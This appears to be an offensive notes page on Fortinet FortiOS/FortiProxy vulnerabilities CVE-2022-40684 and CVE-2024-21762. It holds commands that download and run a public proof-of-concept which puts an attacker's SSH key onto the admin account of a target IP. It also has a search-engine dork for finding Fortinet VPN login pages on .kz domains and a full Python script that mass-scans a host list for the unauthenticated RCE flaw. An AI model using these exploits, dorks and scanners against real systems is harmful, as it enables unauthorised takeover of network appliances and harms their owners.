CVE-2022-40684

POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances

wget <https://raw.githubusercontent.com/horizon3ai/CVE-2022-40684/master/CVE-2022-40684.py>; chmod +x CVE-2022-40684.py;

python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub

• CVE-2022-40684

Dork

site:*.kz intext:"Please Login" inurl:"/remote/login"

CVE-2024-21762 (Unauth RCE)

python3 check-cve-2024-21762.py host_URL.txt

import socket
import ssl
import sys

context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname=False
context.verify_mode=ssl.CERT_NONE

# should be fine for most hosts, increase this if you're getting errors.
TIMEOUT=5

def send_req(host, req):
    try:
        s=socket.create_connection(host, timeout=5)
    except:
        return -1
    ss=context.wrap_socket(s)
    ss.send(req)
    try:
        return ss.read(2048)
    except socket.timeout:
        return 0

control_req="""POST /remote/VULNCHECK HTTP/1.1\\r
Host: {}\\r
Transfer-Encoding: chunked\\r
\\r
0\\r
\\r
\\r
"""

check_req="""POST /remote/VULNCHECK HTTP/1.1\\r
Host: {}\\r
Transfer-Encoding: chunked\\r
\\r
0000000000000000FF\\r
\\r
"""

def check(host):
    baseurl="https://{}:{}".format(*host)
    r1=send_req(host, control_req.format(baseurl).encode())
    if r1==-1:
        return "Connection Failed"
    if r1==0:
        return "Control request failed"
    if b"HTTP/1.1 403 Forbidden" not in r1:
        print("\\033[1;33m[warning] Server does not look like a Fortinet SSL VPN interface\\033[0m")
    r2=send_req(host, check_req.format(baseurl).encode())
    if r2==0:
        return "\\033[1;31mVulnerable\\033[0m"  # Red color for Vulnerable
    else:
        return "\\033[1;32mPatched\\033[0m"     # Green color for Patched

if __name__=="__main__":
    if len(sys.argv) == 3:
        host = (sys.argv[1], int(sys.argv[2]))
        print(check(host))
    elif len(sys.argv) == 2:
        input_file = sys.argv[1]

        with open(input_file, 'r') as file:
            host_urls = file.readlines()

        for url in host_urls:
            url = url.strip()
            if not url:
                continue

            parts = url.split(':')
            host = (parts[0], int(parts[1]))

            print(f"Scanning {url}...", end=' ')
            result = check(host)
            print(result)
    else:
        print("Usage:")
        print("For single check: python3 script.py <host> <port>")
        print("For mass scanning: python3 script.py <host_URL.txt>")